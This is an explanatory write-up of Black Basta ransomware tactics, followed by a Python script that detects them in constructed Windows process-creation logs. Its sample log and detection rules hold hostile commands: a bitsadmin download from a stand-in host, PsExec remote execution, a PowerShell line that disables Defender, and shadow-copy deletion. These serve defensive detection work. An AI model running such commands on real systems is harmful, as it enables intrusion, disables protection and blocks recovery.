Black Basta's initial access relies on spearphishing or exploiting public-facing applications, taking advantage of users' susceptibility to phishing emails and of unpatched systems. Once inside the network, affiliates use BITSAdmin and PsExec for lateral movement, tools that are often overlooked because of their legitimate administrative uses. This underscores the importance of monitoring for unusual activity involving these tools, even though they are commonly used in IT environments.
Privilege escalation techniques involve sophisticated exploits such as ZeroLogon and PrintNightmare, which target critical vulnerabilities in Windows Active Directory domains. These exploits allow attackers to elevate privileges and move laterally within the network, highlighting the need for timely patch management and vulnerability assessment practices to mitigate such risks.
Disabling defenses is a critical step for Black Basta affiliates, who use PowerShell and the custom Backstab tool to disable antivirus and endpoint detection and response (EDR) systems. This phase emphasizes the necessity for robust security configurations and continuous monitoring of PowerShell and other scripting activities.
The final stages of their attack involve encrypting files with a custom implementation of the ChaCha20 cipher and deleting volume shadow copies with vssadmin.exe to prevent recovery. Organizations should prioritize regular backups, keep copies offline, and test restoration processes frequently to limit the impact of such ransomware attacks.
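The monitoring the preceding paragraphs call for (BITSAdmin and PsExec lateral movement, PowerShell used to disable endpoint protection, and vssadmin.exe shadow-copy deletion) can be expressed as a small set of process-creation detections. The script below is an added example, not code from the original advisory or from any vendor; it assumes a simplified key=value rendering of Windows 4688 / Sysmon event 1 process-creation records, and the log lines, hostnames, users and paths are constructed for illustration. The rules are indicative patterns, not a complete signature set, and the per-host escalation logic flags hosts where more than one phase of the chain is observed, which is where these legitimately used tools most deserve a second look.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample events (hosts, users, paths invented). Each line is a
# process-creation record rendered as key=value pairs; no real telemetry.
SAMPLE_LOG = r"""
2024-05-10T08:12:03Z host=WS01 user=CORP\jdoe event=4688 image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c dir"
2024-05-10T08:14:40Z host=WS01 user=CORP\jdoe event=4688 image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin.exe /transfer job1 http://example.invalid/a.bin C:\Users\Public\a.bin"
2024-05-10T08:14:58Z host=WS01 user=CORP\jdoe event=4688 image=C:\Users\Public\PsExec64.exe cmdline="PsExec64.exe \\FS02 -s cmd.exe"
2024-05-10T08:15:02Z host=FS02 user=CORP\svc-backup event=4688 image=C:\Windows\PSEXESVC.exe cmdline="PSEXESVC.exe"
2024-05-10T08:16:11Z host=FS02 user=CORP\svc-backup event=4688 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"
2024-05-10T08:20:55Z host=FS02 user=CORP\svc-backup event=4688 image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2024-05-10T08:21:00Z host=FS02 user=CORP\svc-backup event=4688 image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe list shadows"
"""

# Assumed log layout: ts host= user= event= image= cmdline="..." (no spaces in paths).
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) event=(?P<event>\d+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"$'
)


@dataclass(frozen=True)
class Rule:
    name: str
    phase: str
    image: str    # case-insensitive regex on the image file name only
    cmdline: str  # case-insensitive regex on the full command line


# Illustrative indicators for the behaviours described in the text.
RULES = (
    Rule("bitsadmin_transfer", "ingress tool transfer", r"^bitsadmin\.exe$", r"/transfer\b"),
    Rule("psexec_client", "lateral movement", r"^psexec(64)?\.exe$", r"\\\\\S+"),
    Rule("psexec_service", "lateral movement", r"^psexesvc\.exe$", r""),
    Rule("defender_realtime_off", "defense evasion", r"^powershell\.exe$",
         r"set-mppreference.*disablerealtimemonitoring"),
    Rule("shadow_copy_delete", "inhibit recovery", r"^vssadmin\.exe$", r"delete\s+shadows"),
)


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    user: str
    rule: str
    phase: str
    cmdline: str


def parse_line(line):
    """Return the event fields as a dict, or None if the line is not a record."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(event):
    """Rules whose image-name and command-line patterns both match the event."""
    image_name = event["image"].rsplit("\\", 1)[-1]
    return [r for r in RULES
            if re.search(r.image, image_name, re.I)
            and re.search(r.cmdline, event["cmdline"], re.I)]


def scan(log_text):
    """Run every rule over every process-creation record in the log text."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["event"] != "4688":
            continue
        for r in match_rules(ev):
            findings.append(Finding(ev["ts"], ev["host"], ev["user"], r.name, r.phase, ev["cmdline"]))
    return findings


def hosts_to_escalate(findings, min_phases=2):
    """Hosts on which at least min_phases distinct phases of the chain were seen."""
    phases = defaultdict(set)
    for f in findings:
        phases[f.host].add(f.phase)
    return sorted(h for h, p in phases.items() if len(p) >= min_phases)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts} {f.host:<5} {f.user:<16} {f.rule:<22} {f.phase:<22} {f.cmdline}")
    print("escalate:", hosts_to_escalate(found))
```

The "list shadows" invocation is deliberately left unflagged: listing shadow copies is routine, deleting them is not, and the command-line pattern is what separates the two. Raising `min_phases` trades coverage for precision; in the sample, the threshold of three isolates the file server where defense evasion and recovery inhibition both occurred.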